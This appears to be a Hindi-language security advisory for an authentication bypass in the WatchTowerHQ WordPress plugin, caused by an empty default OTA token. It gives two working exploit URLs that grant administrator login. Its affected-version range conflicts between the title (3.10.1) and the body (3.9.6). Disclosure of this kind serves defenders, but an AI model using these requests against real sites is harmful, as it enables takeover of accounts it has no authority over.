
WatchTowerHQ <= 3.10.1 - रिक्त मान जांच के अभाव के कारण प्रमाणीकरण बायपास द्वारा प्रशासक
WatchTowerHQ <= 3.10.1 - प्रमाणीकरण बायपास से व्यवस्थापक बनना, रिक्त मान जांच के अभाव के कारण
WatchTowerHQ प्लगइन WordPress के लिए 3.9.6 तक और उस सहित संस्करणों में प्रमाणीकरण बायपास के लिए असुरक्षित है। इसका कारण 'watchtower_ota_token' का डिफ़ॉल्ट मान खाली होना है और 'Password_Less_Access::login' फ़ंक्शन में गैर-रिक्त जांच का अभाव है। यह अप्रमाणित हमलावरों को WatchTowerHQ क्लाइंट व्यवस्थापक उपयोगकर्ता में लॉग इन करने में सक्षम बनाता है।
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
http://kubernetes.docker.internal/?wht_login=1
OR
http://kubernetes.docker.internal/?wht_login=1&access_token=not_set
यदि असुरक्षित है तो यह आपको व्यवस्थापक के रूप में लॉग इन कर देगा।